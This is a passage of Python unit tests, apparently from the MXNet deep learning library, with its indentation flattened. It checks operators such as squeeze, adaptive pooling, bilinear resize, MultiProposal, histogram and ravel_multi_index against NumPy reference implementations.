check_slice_partial_infer(var1, (2, 3), (None, 10), (None, 1), (-1, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), (3, 3), (-1, 3))
var1 = mx.sym.var(name='data', shape=(10, -1))
check_slice_axis_partial_infer(var1, 0, 0, 5, (5, -1))
check_slice_axis_partial_infer(var1, 1, 0, 5, (10, -1))
@with_seed()
def test_float16_min_max():
"""Test for issue: https://github.com/apache/incubator-mxnet/issues/9007"""
a = mx.nd.array([np.finfo('float16').min, np.finfo('float16').max], dtype='float16')
assert a.dtype == np.float16
assert np.finfo('float16').min == mx.nd.min(a).asscalar()
assert np.finfo('float16').max == mx.nd.max(a).asscalar()
@with_seed()
@mx.use_np_shape
def test_zero_size_min_max():
def min():
a = mx.nd.zeros(shape=(5, 0))
a.min()
def max():
a = mx.nd.zeros(shape=(5, 0))
a.max()
pytest.raises(MXNetError, min)
pytest.raises(MXNetError, max)
@with_seed()
def test_squeeze_op():
def check_squeeze_op(shape, axis=None):
data = mx.nd.random.uniform(low=-10.0, high=10.0, shape=shape)
if axis is None:
out = mx.nd.squeeze(data).asnumpy()
out_expected = np.squeeze(data.asnumpy())
else:
out = mx.nd.squeeze(data, axis=axis).asnumpy()
out_expected = np.squeeze(data.asnumpy(), axis=axis)
if out.shape == (1,): # as an exception (1, 1, 1) will be squeezed to (1,)
out_expected = np.squeeze(data.asnumpy(), axis=tuple([i for i in range(1, len(shape))]))
assert same(out, out_expected)
# check forward
check_squeeze_op((1, 5, 1, 3, 1), 0)
check_squeeze_op((1, 5, 1, 3, 1), 2)
check_squeeze_op((1, 5, 1, 3, 1), 4)
check_squeeze_op((1, 5, 1, 3, 1), (0, 4))
check_squeeze_op((1, 5, 1, 3, 1), (0, 2, 4))
check_squeeze_op((1, 5, 1, 3, 1))
check_squeeze_op((1, 1, 1, 1))
# check gradient
data = mx.symbol.Variable('data')
shape = (1, 2, 1, 3, 1)
data_tmp = np.ones(shape)
test = mx.sym.squeeze(data)
check_numeric_gradient(test, [data_tmp])
test = mx.sym.squeeze(data, axis=2)
check_numeric_gradient(test, [data_tmp])
test = mx.sym.squeeze(data, axis=(2, 4))
check_numeric_gradient(test, [data_tmp])
@with_seed()
@pytest.mark.serial
def test_adaptive_avg_pool_op():
def py_adaptive_avg_pool(x, height, width):
# 2D per frame adaptive avg pool
def adaptive_avg_pool_frame(x, y):
isizeH, isizeW = x.shape
osizeH, osizeW = y.shape
for oh in range(osizeH):
istartH = int(np.floor(1.0 * (oh * isizeH) / osizeH))
iendH = int(np.ceil(1.0 * (oh + 1) * isizeH / osizeH))
kH = iendH - istartH
for ow in range(osizeW):
istartW = int(np.floor(1.0 * (ow * isizeW) / osizeW))
iendW = int(np.ceil(1.0 * (ow + 1) * isizeW / osizeW))
kW = iendW - istartW
xsum = 0
for ih in range(kH):
for iw in range(kW):
xsum += x[istartH+ih][istartW+iw]
y[oh][ow] = xsum / kH / kW
B,C,_,_ = x.shape
y = np.empty([B,C,height, width], dtype=x.dtype)
for b in range(B):
for c in range(C):
adaptive_avg_pool_frame(x[b][c], y[b][c])
return y
def check_adaptive_avg_pool_op(shape, output_height, output_width=None):
x = mx.nd.random.uniform(shape=shape)
if output_width is None:
y = mx.nd.contrib.AdaptiveAvgPooling2D(x, output_size=output_height)
npy = py_adaptive_avg_pool(x.asnumpy(), output_height, output_height)
else:
y = mx.nd.contrib.AdaptiveAvgPooling2D(x, output_size=(output_height, output_width))
npy = py_adaptive_avg_pool(x.asnumpy(), output_height, output_width)
assert_almost_equal(y.asnumpy(), npy)
shape = (2, 2, 10, 10)
for i in range(1, 11):
check_adaptive_avg_pool_op(shape, i)
for j in range(1, 11):
check_adaptive_avg_pool_op(shape, i, j)
@with_seed()
def test_bilinear_resize_op():
def py_bilinear_resize(x, outputHeight, outputWidth):
batch, channel, inputHeight, inputWidth = x.shape
if outputHeight == inputHeight and outputWidth == inputWidth:
return x
y = np.empty([batch, channel, outputHeight, outputWidth])
rheight = 1.0 * (inputHeight - 1) / (outputHeight - 1) if outputHeight > 1 else 0.0
rwidth = 1.0 * (inputWidth - 1) / (outputWidth - 1) if outputWidth > 1 else 0.0
for h2 in range(outputHeight):
h1r = 1.0 * h2 * rheight
h1 = int(np.floor(h1r))
h1lambda = h1r - h1
h1p = 1 if h1 < (inputHeight - 1) else 0
for w2 in range(outputWidth):
w1r = 1.0 * w2 * rwidth
w1 = int(np.floor(w1r))
w1lambda = w1r - w1
w1p = 1 if w1 < (inputWidth - 1) else 0
for b in range(batch):
for c in range(channel):
y[b][c][h2][w2] = (1-h1lambda)*((1-w1lambda)*x[b][c][h1][w1] + \
w1lambda*x[b][c][h1][w1+w1p]) + \
h1lambda*((1-w1lambda)*x[b][c][h1+h1p][w1] + \
w1lambda*x[b][c][h1+h1p][w1+w1p])
return y
def py_bilinear_resize_backward(x, incoming_grads, mode='size'):
data1 = np.zeros_like(x)
data2 = incoming_grads
batchsize = data1.shape[0]
channels = data1.shape[1]
height1 = data1.shape[2]
width1 = data1.shape[3]
height2 = data2.shape[2]
width2 = data2.shape[3]
rheight = float(height1 - 1) / (height2 - 1) if (height2 > 1) else 0
rwidth = float(width1 - 1) / (width2 - 1) if (width2 > 1) else 0
# special case: just copy
if height1 == height2 and width1 == width2:
data1 += data2
return [data1]
for h2 in range(0, height2):
for w2 in range(0, width2):
h1r = rheight * h2
h1 = int(h1r)
h1p = 1 if (h1 < height1 - 1) else 0
h1lambda = h1r - h1
h0lambda = 1 - h1lambda
#
w1r = rwidth * w2
w1 = int(w1r)
w1p = 1 if (w1 < width1 - 1) else 0
w1lambda = w1r - w1
w0lambda = 1 - w1lambda
#
for n in range(0, batchsize):
for c in range(0, channels):
d2val = data2[n][c][h2][w2]
data1[n][c][h1][w1] += h0lambda * w0lambda * d2val
data1[n][c][h1][w1 + w1p] += h0lambda * w1lambda * d2val
data1[n][c][h1 + h1p][w1] += h1lambda * w0lambda * d2val
data1[n][c][h1 + h1p][w1 + w1p] += h1lambda * w1lambda * d2val
if mode == 'like':
return data1, np.zeros_like(incoming_grads)
return [data1]
def check_bilinear_resize_op(shape, height, width):
x = mx.nd.random.uniform(shape=shape)
y = mx.nd.contrib.BilinearResize2D(x, height=height, width=width)
assert_almost_equal(y, py_bilinear_resize(x.asnumpy(), height, width))
x_scale = width / shape[-1]
y_scale = height / shape[-2]
y = mx.nd.contrib.BilinearResize2D(x, scale_height=y_scale, scale_width=x_scale)
assert_almost_equal(y.asnumpy(), py_bilinear_resize(x.asnumpy(), height, width))
def check_bilinear_resize_align_corners_op():
img_shape = [1, 1, 3, 2]
data = [64, 32, 32, 64, 50, 100]
target_height = 6
target_width = 4
expected_data = {}
# align_corners = False
expected_data[0] = [
64.000, 56.000, 40.000, 32.000, 56.000, 52.000, 44.000, 40.000, 40.000, 44.000, 52.000, 56.000,
36.500, 45.625, 63.875, 73.000, 45.500, 56.875, 79.625, 91.000, 50.000, 62.500, 87.500, 100.000
]
# align_corners = True
expected_data[1] = [
64.000, 53.333, 42.667, 32.000, 51.200, 49.067, 46.933, 44.800, 38.400, 44.800, 51.200, 57.600,
35.600, 47.467, 59.333, 71.200, 42.800, 57.067, 71.333, 85.600, 50.000, 66.667, 83.333, 100.000
]
x = np.array(data, dtype=np.float32).reshape(img_shape)
x_nd = mx.nd.array(x)
y0 = np.array(expected_data[0]).reshape((1, 1, target_height, target_width))
y0_nd = mx.nd.contrib.BilinearResize2D(x_nd, height=target_height, width=target_width, mode='size', align_corners=False)
assert_almost_equal(y0, y0_nd.asnumpy(), atol=1e-3)
y1 = np.array(expected_data[1]).reshape((1, 1, target_height, target_width))
y1_nd = mx.nd.contrib.BilinearResize2D(x_nd, height=target_height, width=target_width, mode='size', align_corners=True)
assert_almost_equal(y1, y1_nd.asnumpy(), atol=1e-3)
def check_bilinear_resize_modes_op(shape, scale_height=None, scale_width=None, shape_1=None, mode=None):
x = mx.nd.random.uniform(shape=shape)
original_h = shape[2]
original_w = shape[3]
if mode == 'odd_scale':
assert scale_height is not None and scale_width is not None
new_h = int(original_h * scale_height) if (original_h % 2) == 0 else \
int((original_h - 1) * scale_height) + 1
new_w = int(original_w * scale_width) if (original_w % 2) == 0 \
else int((original_w - 1) * scale_width) + 1
y = mx.nd.contrib.BilinearResize2D(x, scale_height=scale_height,
scale_width=scale_width,
mode='odd_scale')
elif mode == 'to_even_down':
new_h = original_h if (original_h % 2) == 0 else original_h - 1
new_w = original_w if (original_w % 2) == 0 else original_w - 1
y = mx.nd.contrib.BilinearResize2D(x, mode='to_even_down')
elif mode == 'to_even_up':
new_h = original_h if (original_h % 2) == 0 else original_h + 1
new_w = original_w if (original_w % 2) == 0 else original_w + 1
y = mx.nd.contrib.BilinearResize2D(x, mode='to_even_up')
elif mode == 'to_odd_down':
new_h = original_h if (original_h % 2) == 1 else original_h - 1
new_w = original_w if (original_w % 2) == 1 else original_w - 1
y = mx.nd.contrib.BilinearResize2D(x, mode='to_odd_down')
elif mode == 'to_odd_up':
new_h = original_h if (original_h % 2) == 1 else original_h + 1
new_w = original_w if (original_w % 2) == 1 else original_w + 1
y = mx.nd.contrib.BilinearResize2D(x, mode='to_odd_up')
elif mode == 'like':
x_1 = mx.nd.random.uniform(shape=shape_1)
new_h = x_1.shape[2]
new_w = x_1.shape[3]
y = mx.nd.contrib.BilinearResize2D(x, x_1, mode='like')
new_shape_desired = np.array([shape[0], shape[1], new_h, new_w], dtype='int')
new_shape_got = np.array(y.shape, dtype='int')
data_sym = mx.sym.var('data')
data_np = x.asnumpy()
expected = py_bilinear_resize(data_np, new_h, new_w)
out_grads = np.ones([shape[0], shape[1], new_h, new_w])
expected_backward = py_bilinear_resize_backward(data_np, out_grads, mode)
assert_array_equal(new_shape_desired, new_shape_got, "Desired and got shapes are not equal. {} vs {}".format(
str(new_shape_desired.tolist()), str(new_shape_got.tolist())))
assert_almost_equal(y.asnumpy(), expected, 1e-3, 0)
if mode != 'like':
resize_sym = mx.sym.contrib.BilinearResize2D(data_sym, None, scale_height=scale_height, scale_width=scale_width, mode=mode)
check_symbolic_forward(resize_sym, [data_np], [expected], rtol=1e-3, atol=1e-5)
check_symbolic_backward(resize_sym, [data_np], [out_grads], expected_backward, rtol=1e-3, atol=1e-5)
check_numeric_gradient(resize_sym, [data_np], rtol=1e-2, atol=1e-4)
else:
data_sym_like = mx.sym.var('data_like')
resize_sym = mx.sym.contrib.BilinearResize2D(data_sym, data_sym_like, mode=mode)
date_np_like = x_1.asnumpy()
check_symbolic_forward(resize_sym, [data_np, date_np_like], [expected], rtol=1e-3, atol=1e-5)
check_symbolic_backward(resize_sym, [data_np, date_np_like], [out_grads], expected_backward, rtol=1e-3, atol=1e-5)
check_numeric_gradient(resize_sym, [data_np, date_np_like], rtol=1e-2, atol=1e-4)
shape = (2, 2, 10, 10)
check_bilinear_resize_op(shape, 5, 5)
check_bilinear_resize_op(shape, 10, 10)
check_bilinear_resize_op(shape, 15, 15)
check_bilinear_resize_op(shape, 3, 7)
check_bilinear_resize_op(shape, 13, 17)
shape = (2, 2, 20, 20)
check_bilinear_resize_modes_op(shape, scale_height=0.5, scale_width=0.5, mode='odd_scale')
check_bilinear_resize_modes_op(shape, scale_height=5, scale_width=10, mode='odd_scale')
check_bilinear_resize_modes_op(shape, scale_height=0.1, scale_width=0.2, mode='odd_scale')
check_bilinear_resize_modes_op(shape, mode='to_even_down')
check_bilinear_resize_modes_op(shape, mode='to_even_up')
check_bilinear_resize_modes_op(shape, mode='to_odd_down')
check_bilinear_resize_modes_op(shape, mode='to_odd_up')
shape = (2, 2, 21, 21)
check_bilinear_resize_modes_op(shape, scale_height=0.5, scale_width=0.5, mode='odd_scale')
check_bilinear_resize_modes_op(shape, scale_height=5, scale_width=10, mode='odd_scale')
check_bilinear_resize_modes_op(shape, scale_height=0.1, scale_width=0.2, mode='odd_scale')
check_bilinear_resize_modes_op(shape, mode='to_even_down')
check_bilinear_resize_modes_op(shape, mode='to_even_up')
check_bilinear_resize_modes_op(shape, mode='to_odd_down')
check_bilinear_resize_modes_op(shape, mode='to_odd_up')
shape_0 = (2, 2, 21, 21)
shape_1 = (2, 2, 10, 10)
check_bilinear_resize_modes_op(shape_0, shape_1=shape_1, mode='like')
check_bilinear_resize_modes_op(shape_1, shape_1=shape_0, mode='like')
check_bilinear_resize_align_corners_op()
def test_multi_proposal_op():
# paramters
feature_stride = 16
scales = (8, 16, 32)
ratios = (0.5, 1, 2)
rpn_pre_nms_top_n = 12000
rpn_post_nms_top_n = 2000
threshold = 0.7
rpn_min_size = 16
batch_size = 20
feat_len = (1000 + 15) // 16
H, W = feat_len, feat_len
num_anchors = len(scales) * len(ratios)
count_anchors = H * W * num_anchors
'''
cls_prob: (batch_size, 2 * num_anchors, H, W)
bbox_pred: (batch_size, 4 * num_anchors, H, W)
im_info: (batch_size, 3)
'''
cls_prob = mx.nd.empty((batch_size, 2 * num_anchors, H, W), dtype = np.float32)
bbox_pred = mx.nd.empty((batch_size, 4 * num_anchors, H, W), dtype = np.float32)
im_info = mx.nd.empty((batch_size, 3), dtype = np.float32)
cls_prob = mx.nd.array(np.random.random(cls_prob.shape))
bbox_pred = mx.nd.array(np.random.random(bbox_pred.shape))
for i in range(batch_size):
im_size = np.random.randint(100, feat_len * feature_stride, size = (2,))
im_scale = np.random.randint(70, 100) / 100.0
im_info[i, :] = [im_size[0], im_size[1], im_scale]
def get_sub(arr, i):
new_shape = list(arr.shape)
new_shape[0] = 1
res = arr[i].reshape(new_shape)
return res
def check_forward(rpn_pre_nms_top_n, rpn_post_nms_top_n):
single_proposal = []
single_score = []
for i in range(batch_size):
rois, score = mx.nd.contrib.Proposal(
cls_prob = get_sub(cls_prob, i),
bbox_pred = get_sub(bbox_pred, i),
im_info = get_sub(im_info, i),
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = threshold,
rpn_min_size = rpn_min_size, output_score = True)
single_proposal.append(rois)
single_score.append(score)
multi_proposal, multi_score = mx.nd.contrib.MultiProposal(
cls_prob = cls_prob,
bbox_pred = bbox_pred,
im_info = im_info,
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = threshold,
rpn_min_size = rpn_min_size, output_score = True)
single_proposal = mx.nd.stack(*single_proposal).reshape(multi_proposal.shape)
single_score = mx.nd.stack(*single_score).reshape(multi_score.shape)
single_proposal_np = single_proposal.asnumpy()
multi_proposal_np = multi_proposal.asnumpy()
single_score_np = single_score.asnumpy()
multi_score_np = multi_score.asnumpy()
# check rois x1,y1,x2,y2
assert np.allclose(single_proposal_np[:, 1:], multi_proposal_np[:, 1:])
# check rois batch_idx
for i in range(batch_size):
start = i * rpn_post_nms_top_n
end = start + rpn_post_nms_top_n
assert (multi_proposal_np[start:end, 0] == i).all()
# check score
assert np.allclose(single_score_np, multi_score_np)
def check_backward(rpn_pre_nms_top_n, rpn_post_nms_top_n):
im_info_sym = mx.sym.Variable('im_info')
cls_prob_sym = mx.sym.Variable('cls_prob')
bbox_pred_sym = mx.sym.Variable('bbox_pred')
sym = mx.sym.contrib.MultiProposal(
cls_prob = cls_prob_sym,
bbox_pred = bbox_pred_sym,
im_info = im_info_sym,
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = threshold,
rpn_min_size = rpn_min_size, output_score = False)
location = [cls_prob.asnumpy(), bbox_pred.asnumpy(), im_info.asnumpy()]
expected = [np.zeros_like(e) for e in location]
out_grads = [np.ones((rpn_post_nms_top_n, 5))]
check_symbolic_backward(sym, location, out_grads, expected)
check_forward(rpn_pre_nms_top_n, rpn_post_nms_top_n)
check_forward(rpn_pre_nms_top_n, 1500)
check_forward(1000, 500)
check_backward(rpn_pre_nms_top_n, rpn_post_nms_top_n)
@with_seed()
def test_quadratic_function():
def f(x, a, b, c):
return a * x**2 + b * x + c
a = np.random.random_sample()
b = np.random.random_sample()
c = np.random.random_sample()
data = mx.symbol.Variable('data')
quad_sym = mx.sym.contrib.quadratic(data=data, a=a, b=b, c=c)
for dtype in [np.float16, np.float32, np.float64]:
tol = 1e-2 if dtype is np.float16 else 1e-5
for ndim in range(1, 6):
shape = rand_shape_nd(ndim, 5)
data_np = np.random.randn(*shape).astype(dtype)
expected = f(data_np, a, b, c)
backward_expected = 2 * a * data_np + b
# check imperative forward
output = mx.nd.contrib.quadratic(mx.nd.array(data_np), a=a, b=b, c=c)
assert_almost_equal(output, expected, rtol=tol, atol=tol)
# check forward
check_symbolic_forward(quad_sym, [data_np], [expected], rtol=tol, atol=tol)
# check backward
check_symbolic_backward(quad_sym, [data_np], [np.ones(expected.shape)],
[backward_expected], rtol=tol, atol=tol)
# check backward using finite difference
check_numeric_gradient(quad_sym, [data_np], atol=0.001)
def allclose_function(contexts):
def getRandom(base, percent = 1.):
return base * (1 + percent * (2 * np.random.random_sample() - 1.) / 100)
title = 'exp'
for ctx in contexts:
title += ' cpu' if ctx == mx.cpu() else ' gpu'
title += ' nElem shape'
num_ctx = len(contexts)
result = [False, False]
for dtype in [np.float16, np.float32, np.float64]:
rtol = getRandom(1e-2 if dtype is np.float16 else 1e-5)
atol = getRandom(1e-4 if dtype is np.float16 else 1e-7)
print('\nnumpy.{}: atol = {} rtol = {}'.format(dtype.__name__, atol, rtol))
print(title)
for ndim in range(1, 10):
shape = rand_shape_nd(ndim, 8)
a_np = np.random.randn(*shape).astype(dtype)
b_np = (a_np + np.random.randn(*shape).astype(dtype) / 10000000).astype(dtype)
expected = np.allclose(a_np, b_np, rtol, atol)
for n, ctx in enumerate(contexts):
a_ctx = mx.nd.array(a_np, dtype = dtype, ctx=ctx)
b_ctx = mx.nd.array(b_np, dtype = dtype, ctx=ctx)
output = mx.nd.contrib.allclose(a_ctx, b_ctx, rtol=rtol, atol=atol)
result[n] = output.asnumpy() == 1
if expected != result[n]:
# Preparing the output of elements of the array, which are considered as "not close" AND
# corresponding elements of comparison CPU/GPU/Python vectors, which are considered as "close"
v_ctx = 'CPU' if ctx == mx.cpu() else 'GPU'
if expected:
v_cmp = 'Python'
a_b = a_ctx.asnumpy()
b_b = b_ctx.asnumpy()
a_g = np.asarray(a_np)
b_g = np.asarray(b_np)
else:
v_cmp = v_ctx
v_ctx = 'Python'
a_b = np.asarray(a_np)
b_b = np.asarray(b_np)
a_g = a_ctx.asnumpy()
b_g = b_ctx.asnumpy()
print('\n *** Violations found on %s, but not on %s side ***' % (v_ctx, v_cmp))
frmt = " a[{0:d}]: b[{0:d}]:" \
" abs(a[{0:d}]-b[{0:d}]) - atol + rtol*abs(b[{0:d}]):"
# Define the indices of all violations and corresponding values of coordinates
bad_indexes = np.abs(a_b - b_b) >= atol + rtol * abs(b_b)
a_values = [a_b[bad_indexes], a_g[bad_indexes]]
b_values = [b_b[bad_indexes], b_g[bad_indexes]]
idx = np.asarray(np.where(bad_indexes == True))
idx = idx.reshape(1, idx.size)
idx_flat = np.asarray(np.where(bad_indexes.flatten() == True)).flatten()
for i in range(len(a_values[0])):
flat_idx = idx_flat[i]
print('{}: index = {} flat_index = {}'.format('%4d'%i, idx[i], flat_idx))
print(frmt.format(flat_idx))
for j in range(2):
diff = np.abs(a_values[j][i]-b_values[j][i]) - atol + rtol*abs(b_values[j][i])
print('{}: {} {} {}'.format('%6s'%v_ctx, a_values[j][i], b_values[j][i], diff))
if num_ctx == 1:
print(' {0:d} {1:d} {2:10d} {3:}'.format(expected, result[0], np.prod(shape), shape))
else:
print(' {0:d} {1:d} {2:d} {3:10d} {4:}'.format(expected, result[0], result[1], np.prod(shape), shape))
if expected != result[0] or num_ctx > 1 and expected != result[1]:
assert False
@with_seed()
@pytest.mark.serial
def test_allclose_function():
allclose_function([default_context()])
@with_seed()
def test_histogram():
def f(x, bins=10, range=None):
return np.histogram(x, bins, range=range)
for ndim in range(1, 6):
shape = rand_shape_nd(ndim)
x = rand_ndarray(shape, stype='default', dtype=np.float64)
mx_bins = mx.nd.array([-1.0, 0.5, 2.0, 4.5, 50.0], dtype=np.float64)
np_bins = mx_bins.asnumpy()
bin_cnt = random.randint(2, 10)
bin_range = (-2.5, 2.5)
mx_histo1, mx_bins1 = mx.nd.histogram(x, bins=bin_cnt, range=bin_range)
np_histo1, np_bins1 = f(x.asnumpy(), bins=bin_cnt, range=bin_range)
assert_almost_equal(mx_bins1, np_bins1)
assert_almost_equal(mx_histo1, np_histo1, rtol=1e-3, atol=1e-5)
mx_histo2, mx_bins2 = mx.nd.histogram(x, bins=mx_bins)
np_histo2, np_bins2 = f(x.asnumpy(), bins=np_bins)
assert_almost_equal(mx_histo2, np_histo2, rtol=1e-3, atol=1e-5)
assert_almost_equal(mx_bins2, np_bins2, rtol=1e-3, atol=1e-5)
data = mx.sym.Variable("data")
bins = mx.sym.Variable("bins")
histo1 = mx.sym.histogram(a=data, bins=bin_cnt, range=bin_range)
histo2 = mx.sym.histogram(a=data, bins=bins)
executor1 = histo1.bind(ctx=default_context(), args={"data" : x})
executor1.forward(is_train=False)
assert_almost_equal(np_histo1, executor1.outputs[0].asnumpy(), 0, 0, ("EXPECTED_histo1", "FORWARD_histo1"), equal_nan=False)
executor2 = histo2.bind(ctx=default_context(), args={"data" : x, "bins" : mx_bins})
executor2.forward(is_train=False)
assert_almost_equal(np_histo2, executor2.outputs[0].asnumpy(), 0, 0, ("EXPECTED_histo2", "FORWARD_histo2"), equal_nan=False)
def test_op_output_names_monitor():
def check_name(op_sym, expected_names):
output_names = []
def get_output_names_callback(name, arr):
output_names.append(py_str(name))
op_exe = op_sym.simple_bind(ctx=mx.current_context(), grad_req='null')
op_exe.set_monitor_callback(get_output_names_callback, monitor_all=False)
try:
op_exe.forward()
mx.nd.waitall()
except mx.base.MXNetError:
# skip errors since test is to check output names
pass
for output_name, expected_name in zip(output_names, expected_names):
assert output_name == expected_name
is_windows = sys.platform.startswith('win')
if (is_windows):
# Windows doesn't support set environment variable on the fly, so disable it for now
pass
else:
# Disable subgraph in case subgraph will replace symbol
os.environ['MXNET_SUBGRAPH_BACKEND'] = "NONE"
data = mx.sym.Variable('data', shape=(10, 3, 10, 10))
conv_sym = mx.sym.Convolution(data, kernel=(2, 2), num_filter=1, name='conv')
check_name(conv_sym, ['conv_output'])
deconv_sym = mx.sym.Deconvolution(data, kernel=(2, 2), num_filter=1, name='deconv')
check_name(deconv_sym, ['deconv_output'])
fc_sym = mx.sym.FullyConnected(data, num_hidden=10, name='fc')
check_name(fc_sym, ['fc_output'])
lrn_sym = mx.sym.LRN(data, nsize=1, name='lrn')
check_name(lrn_sym, ['lrn_output', 'lrn_tmp_norm'])
act_sym = mx.sym.Activation(data, act_type='relu', name='act')
check_name(act_sym, ['act_output'])
cc_sym = mx.sym.concat(data, data, dim=0, name='concat')
check_name(cc_sym, ['concat_output'])
sm_sym = mx.sym.softmax(data, name='softmax')
check_name(sm_sym, ['softmax_output'])
sa_sym = mx.sym.SoftmaxActivation(data, name='softmax')
check_name(sa_sym, ['softmax_output'])
us_sym = mx.sym.UpSampling(data, scale=2, sample_type='nearest',
name='upsampling')
check_name(us_sym, ['upsampling_output'])
us_sym = mx.sym.Pooling(data, kernel=(2, 2), pool_type='avg',
name='pooling')
check_name(us_sym, ['pooling_output'])
del os.environ['MXNET_SUBGRAPH_BACKEND']
def test_op_all_names_monitor():
def check_name(op_sym, expected_names):
output_names = []
def get_output_names_callback(name, arr):
output_names.append(py_str(name))
op_exe = op_sym.simple_bind(ctx=mx.current_context(), grad_req='null')
op_exe.set_monitor_callback(get_output_names_callback, monitor_all=True)
try:
op_exe.forward()
mx.nd.waitall()
except mx.base.MXNetError:
# skip errors since test is to check all names
pass
for output_name, expected_name in zip(output_names, expected_names):
assert output_name == expected_name
is_windows = sys.platform.startswith('win')
if (is_windows):
# Windows doesn't support set environment variable on the fly, so disable it for now
pass
else:
# Disable subgraph in case subgraph will replace symbol
os.environ['MXNET_SUBGRAPH_BACKEND'] = "NONE"
data = mx.sym.Variable('data', shape=(10, 3, 10, 10))
conv_sym = mx.sym.Convolution(data, kernel=(2, 2), num_filter=1, name='conv')
check_name(conv_sym, ['data', 'conv_data', 'conv_weight', 'conv_weight', 'conv_bias', 'conv_bias', 'conv_output'])
deconv_sym = mx.sym.Deconvolution(data, kernel=(2, 2), num_filter=1, name='deconv')
check_name(deconv_sym, ['data', 'deconv_data', 'deconv_weight', 'deconv_weight', 'deconv_output'])
fc_sym = mx.sym.FullyConnected(data, num_hidden=10, name='fc')
check_name(fc_sym, ['data', 'fc_data', 'fc_weight', 'fc_weight', 'fc_bias', 'fc_bias', 'fc_output'])
lrn_sym = mx.sym.LRN(data, nsize=1, name='lrn')
check_name(lrn_sym, ['data', 'lrn_data', 'lrn_output', 'lrn_tmp_norm'])
act_sym = mx.sym.Activation(data, act_type='relu', name='act')
check_name(act_sym, ['data', 'act_input0', 'act_output'])
cc_sym = mx.sym.concat(data, data, dim=0, name='concat')
check_name(cc_sym, ['data', 'concat_arg0', 'data', 'concat_arg1', 'concat_output'])
sm_sym = mx.sym.softmax(data, name='softmax')
check_name(sm_sym, ['data', 'softmax_data', 'softmax_output'])
length = mx.sym.Variable("length", shape=(10, 10, 10))
sm_sym = mx.sym.softmax(data, length, axis=1, use_length=True, name='softmax')
check_name(sm_sym, ['data', 'softmax_data', 'length', 'softmax_length', 'softmax_output'])
sa_sym = mx.sym.SoftmaxActivation(data, name='softmax')
check_name(sa_sym, ['data', 'softmax_input0', 'softmax_output'])
us_sym = mx.sym.UpSampling(data, scale=2, sample_type='nearest',
name='upsampling')
check_name(us_sym, ['data', 'upsampling_arg0', 'upsampling_output'])
us_sym = mx.sym.Pooling(data, kernel=(2, 2), pool_type='avg',
name='pooling')
check_name(us_sym, ['data', 'pooling_data', 'pooling_output'])
del os.environ['MXNET_SUBGRAPH_BACKEND']
@with_seed()
@unittest.skip("test fails intermittently. temporarily disabled till it gets fixed. tracked at https://github.com/apache/incubator-mxnet/issues/13915")
def test_activation():
shapes = [(9,), (9, 10), (9, 10, 10), (1, 9, 10, 10)]
dtype_l = [np.float64, np.float32, np.float16]
rtol_l = [1e-7, 1e-6, 1e-2]
atol_l = [1e-7, 1e-6, 1e-2]
rtol_fd = 1e-5
atol_fd = 1e-6
num_eps = 1e-6
unary_ops = {
'relu': [lambda x: mx.sym.Activation(x, act_type='relu'),
lambda x: np.maximum(x, 0.),
lambda x: 1. * (x > 0.),
-5.0, 5.0],
'sigmoid': [lambda x: mx.sym.Activation(x, act_type='sigmoid'),
lambda x: 1. / (np.exp(-x) + 1.),
lambda x: 1. / (np.exp(-x) + 1.) / (np.exp(x) + 1.),
-3.0, 3.0],
'tanh': [lambda x: mx.sym.Activation(x, act_type='tanh'),
lambda x: np.tanh(x),
lambda x: 1. - np.tanh(x) ** 2,
-4.0, 4.0],
'softrelu': [lambda x: mx.sym.Activation(x, act_type='softrelu'),
lambda x: np.log(1. + np.exp(x)),
lambda x: 1. - 1 / (1 + np.exp(x)),
-3.0, 3.0],
'softsign': [lambda x: mx.sym.Activation(x, act_type='softsign'),
lambda x: x / (1. + np.abs(x)),
lambda x: 1. / np.square(1. + np.abs(x)),
-3.0, 3.0],
}
# Loop over operators
for name, op in unary_ops.items():
# Loop over shapes
for shape in shapes:
# Loop over dtype's
for ind in range(len(dtype_l)):
dtype = dtype_l[ind]
rtol = rtol_l[ind]
atol = atol_l[ind]
compare_forw_backw_unary_op(
name, op[0], op[1], op[2], shape, op[3], op[4], rtol, atol,
dtype)
# Finite difference testing
finite_diff_unary_op(
name, op[0], shape, op[3], op[4], rtol_fd, atol_fd, num_eps)
@with_seed()
@pytest.mark.serial
def test_ravel():
# be aware that check_symbolic_forward will use float type internally
# for the arrays and that limits the representable flat index range.
# Taking dim==4 and a range of [0,..,100] for the data can already
# cause precision issues and break this test.
for dim in [1, 2, 3, 4]:
data = np.random.randint(50, size=(dim, 500))
shape = tuple(np.add(np.amax(data, axis=1), [1]))
a = mx.sym.Variable('a')
ravel_npy = np.ravel_multi_index(data, shape)
b = mx.sym.ravel_multi_index(a, shape=shape)
check_symbolic_forward(b, location={'a': data}, expected=[ravel_npy])
c = mx.sym.unravel_index(a, shape=shape)
check_symbolic_forward(c, location={'a': ravel_npy}, expected=[data])
# Test with leading dimension set to -1.
shape2 = shape
shape2 = (-1,)+shape[1:]
b = mx.sym.ravel_multi_index(a, shape=shape2)
check_symbolic_forward(b, location={'a': data}, expected=[ravel_npy])
c = mx.sym.unravel_index(a, shape=shape2)
check_symbolic_forward(c, location={'a': ravel_npy}, expected=[data])
@with_seed()
def test_unravel_index():
unravel_shape = (2, 10)
unravel_size = np.prod(unravel_shape)
for shape in [(10,), (2, 10), (3, 4, 5)]:
a = np.random.randint(0, unravel_size, size=shape)
b = np.stack(np.unravel_index(a, shape=unravel_shape), 0)
a_mx = mx.nd.array(a)
b_mx = mx.nd.unravel_index(a_mx, shape=unravel_shape)
assert_array_equal(b, b_mx.asnumpy())
def test_context_num_gpus():
try:
# Note: the test is run both on GPU and CPU hosts, so that we can not assert
# on a specific number here.
assert mx.context.num_gpus() >= 0
except mx.MXNetError as e:
# Note: On a CPU only host CUDA sometimes is not able to determine the number
# of GPUs
if str(e).find("CUDA") == -1:
raise e
@with_seed()
@pytest.mark.serial
def test_op_roi_align():
T = np.float32
def assert_same_dtype(dtype_a, dtype_b):
'''
Assert whether the two data type are the same
Parameters
----------
dtype_a, dtype_b: type
Input data types to compare
'''
assert dtype_a == dtype_b,\
